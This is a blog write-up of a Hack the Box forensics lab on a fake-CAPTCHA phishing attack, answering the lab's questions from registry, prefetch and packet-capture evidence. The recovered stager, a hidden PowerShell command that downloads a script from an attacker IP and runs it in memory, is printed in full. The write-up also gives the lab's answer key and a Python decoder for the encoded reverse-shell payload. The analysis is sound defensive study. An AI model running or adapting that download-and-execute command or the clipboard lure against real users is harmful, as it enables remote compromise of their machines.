
Pikaptchu - Hack the Box - DFIR

  • BlueDolphin
  • May 5
  • 3 min read

Updated: May 6



Scenario



šŸ› ļø Scenario Overview

An attacker sends a phishing email to the victim, claiming it's an urgent Microsoft Office update. The email includes a link that leads to a malicious website.


Upon visiting the site, the victim is presented with a CAPTCHA. After solving it, they're instructed to paste content from their clipboard into the Windows Run dialog.


A non-technical user falls for the scheme and unknowingly executes a PowerShell payload. This payload downloads a second PowerShell script and runs it directly in memory: a reverse shell that gives the attacker remote access to the victim's machine.

How the attack happened


šŸ” Provided Evidence

  • PCAP File – Network traffic capture

  • KAPE Forensic Collection

  • Prefetch Files

  • Registry Hive


🧰 Tools Used

Walkthrough


It is crucial to understand any payloads executed on the system for initial access. Analyzing the registry hive for user happy grunwald, what is the full command that was run to download and execute the stager?


Understanding how initial access was achieved is critical in incident response. In this scenario, we analyze the Registry Hive for user Happy Grunwald.


A good starting point in a KAPE dump is to investigate PowerShell or Command Prompt activity. The RecentDocs key can reveal if any malicious files were recently accessed. Based on the scenario, we suspect a browser-based drive-by attack.


Modern browsers typically restrict passing commands directly to PowerShell, but this protection can be bypassed via vulnerabilities in browser plugins or extensions.


Key Registry Path:

Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU


Malicious Command Found:


powershell -NOP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"




At what time in UTC did the malicious payload execute?

This can be found in conjunction with the registry artifacts and timestamped entries discussed above.


The payload which was executed initially downloaded a PowerShell script and executed it in memory. What is sha256 hash of the script?


Extract the .ps1 file using Wireshark:

  1. Go to File → Export Objects → HTTP.

  2. Search for the .ps1 extension.

  3. Download the file and calculate the hash locally or upload it to VirusTotal.



✅ Answer: 579284442094E1A44BEA9CFB7D8D794C8977714F827C97BCB2822A97742914DE


To which port did the reverse shell connect?


The payload embedded in the extracted file is encoded, so we need to perform a few operations to make it readable:

  1. Decode from base64

  2. Remove null bytes

  3. Generic Code Beautify

  4. Syntax Highlighter

With the above operations, we are able to decode and format the payload into a human readable form.

✅ Answer: 6969
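The decode steps above (base64, then null-byte removal) and the hash check from the earlier question, as an added Python example that is not part of the original write-up. The encoded blob it works on is a constructed stand-in, not the challenge's script, and the TCPClient pattern used to pull out the host and port is an assumption about what the stager looks like.

```python
import base64
import hashlib
import re
from typing import Optional, Tuple

# Constructed sample, NOT the script from the challenge. It only mimics the
# shape of the real payload: base64 of UTF-16LE text, which is what PowerShell
# expects and why "null bytes" show up when the blob is decoded as plain ASCII.
SAMPLE_SCRIPT = (
    "$client = New-Object System.Net.Sockets.TCPClient('43.205.115.44', 6969)\n"
    "Write-Host 'constructed sample, no further behaviour'\n"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
# Second constructed sample: base64 of plain ASCII, to exercise the fallback path.
SAMPLE_ASCII_B64 = base64.b64encode(b"Write-Host 'plain ascii blob'").decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Steps 1 and 2 of the walkthrough: base64-decode, then drop the nulls.
    Decoding as UTF-16LE is the faithful form of "remove null bytes"; the
    fallback strips stray nulls from blobs that were base64 of plain text."""
    raw = base64.b64decode(blob, validate=True)
    # Even length with a zero in every second byte is the UTF-16LE signature
    # for ASCII-only script text.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.replace(b"\x00", b"").decode("utf-8", errors="replace")


# Assumed pattern: a TCPClient('host', port) call in the decoded reverse shell.
TCPCLIENT_RE = re.compile(
    r"TCPClient\(\s*['\"]([\d.]+)['\"]\s*,\s*(\d{1,5})\s*\)", re.IGNORECASE
)


def extract_c2(script: str) -> Optional[Tuple[str, int]]:
    """Return the (host, port) pair the decoded script connects to, if any."""
    m = TCPCLIENT_RE.search(script)
    return (m.group(1), int(m.group(2))) if m else None


def sha256_hex(data: bytes) -> str:
    """Hash the bytes exactly as exported, matching sha256sum or VirusTotal."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_B64)
    print(decoded)
    print("C2 indicator:", extract_c2(decoded))
    print("SHA256 of exported script:", sha256_hex(SAMPLE_SCRIPT.encode()))
```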


For how many seconds was the reverse shell connection established between C2 and the victim's workstation?


Looking at the connection over port 6969, we can calculate the time from the initial connection to the tear down.


✅ Answer: 403 seconds


Attacker hosted a malicious Captcha to lure in users. What is the name of the function which contains the malicious payload to be pasted in victim's clipboard?


Searching for our known IP address, paired with a filter for the HTTP protocol, shows us at packet 57543 that the user visited a webpage. While we can certainly derive the answer from here by looking through the packet, we can also export this object to see what the attacker's landing page looked like.


✅ Answer: stageClipboard


✅ Conclusion

This scenario highlights the creativity of modern phishing attacks. Social engineering, clipboard hijacking, and memory-only payloads combine to bypass traditional defenses. Always be cautious with unexpected prompts, especially those involving the Run dialog or PowerShell.

THE END
